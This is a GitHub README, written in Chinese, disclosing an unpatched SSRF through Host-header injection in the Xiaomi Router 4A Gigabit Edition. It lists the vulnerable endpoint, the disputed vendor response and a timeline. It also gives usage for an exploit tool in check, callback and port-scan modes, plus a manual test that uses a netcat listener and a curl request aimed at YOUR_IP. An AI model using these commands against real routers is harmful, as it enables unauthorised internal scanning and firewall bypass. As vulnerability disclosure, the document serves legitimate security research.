iwallplace/CVE-2026-26898-Xiaomi-SSRF-HostHeaderInjection

GitHub: iwallplace/CVE-2026-26898-Xiaomi-SSRF-HostHeaderInjection

小米路由器SSRF漏洞利用工具

Stars: 0 | Forks: 1

# CVE-2026-26898:小米路由器4A千兆版 - 通过主机头注入的SSRF漏洞 ![漏洞](https://img.shields.io/badge/Vulnerability-High-orange) ![CVSS](https://img.shields.io/badge/CVSS-8.6%20(researcher)-orange) ![状态](https://img.shields.io/badge/Status-Unpatched-red) ![供应商](https://img.shields.io/badge/Vendor-Disputed-lightgrey) ## 摘要 小米路由器4A千兆版存在一个服务器端请求伪造(SSRF)漏洞。路由器的Web界面未能验证HTTP `Host`头,允许未经身份验证的攻击者强制路由器建立任意的出站TCP连接。 | 字段 | 值 | |------|-------| | **设备** | 小米路由器4A千兆版 | | **固件** | 3.0.24(国际版) | | **CVE** | CVE-2026-26898 *(争议 - 见披露状态以下)* | | **CWE** | CWE-918(服务器端请求伪造) | | **CVSS 3.1** | 8.6(高) — 研究员评估;供应商对严重性有争议 | ## 供应商响应与披露状态 - 通过HackerOne(报告 **#3513458**)于**2026-01-16**向小米报告。 - **2026-01-23**,小米将该报告关闭为**信息性**,称其为已知问题,路由器“仍然依赖于代理功能”,并将其归类为**低风险,不会修复**。 - **研究员立场**:严重性评级存在争议。截至2026年1月,该设备仍在官方小米渠道(mi.com/tr)上积极销售,端点**无需身份验证**即可访问,SSRF允许内部网络扫描和访问信任本地连接的服务。该行为**尚未修复**。 CVE-2026-26898在此处仅用于跟踪;鉴于供应商的争议,应将其视为**争议/未确认**,而不是供应商确认的。 ## 受影响端点 ``` GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1 Host: : ``` ## 演示 ### 截图 ![攻击演示](https://static.pigsec.cn/wp-content/uploads/repos/2026/06/1fa80b48cf114058.png) ### 快速测试 ``` python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check ``` ### 输出 ``` [*] Checking vulnerability on 192.168.31.1... [*] Local IP: 192.168.31.235 [*] Test Port: 44444 [+] VULNERABLE! Router connected back to 192.168.31.235:44444 ``` ### 手动测试 ``` # 终端 1:启动监听器 nc -l 4444 # 终端 2:发送恶意请求 curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login" ``` ## 影响 - **内部网络扫描**:使用路由器作为代理扫描内部网络 - **防火墙绕过**:访问仅限于路由器IP的服务 - **攻击链**:可以与其他漏洞结合用于RCE ## 文件 | 文件 | 描述 | |------|-------------| | `xiaomi_ssrf_exploit.py` | 具有多个模式的完整漏洞利用 | ## 漏洞利用方法 ``` # 检查是否存在漏洞 python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --check # 回调模式 python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --callback YOUR_IP --port 4444 # 端口扫描器 python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --scan TARGET_IP --ports 22,23,80,443 ``` ## 时间线 | 日期 | 事件 | |------|-------| | 2026-01-15 | 发现漏洞;开发PoC | | 2026-01-16 | 通过HackerOne(报告 **#3513458**)向小米报告 | | 2026-01-23 | 小米将该报告关闭为**信息性**(低风险,不会修复) | | 2026-06-03 | 公开警告发布(此存储库) — 供应商有争议,未修复 | ## 参考资料 - HackerOne报告 **#3513458**(提交给小米;已关闭为信息性) - CWE-918:服务器端请求伪造(SSRF) ## 免责声明 此漏洞利用仅提供用于教育和授权安全测试目的。未经授权访问计算机系统是非法的。 ## 作者 **Ahmet Mersin** 🌐 [ahmetmersin.com](https://ahmetmersin.com) 🐙 [@iwallplace](https://github.com/iwallplace)
标签:CVE-2026-26898, CVSS评分, CWE-918, HackerOne, SSRF, Xiaomi, 主机头注入, 厂商响应, 反取证, 安全测试, 安全漏洞, 安全评估, 攻击性安全, 未修复漏洞, 未授权访问, 漏洞等级, 路由器, 逆向工具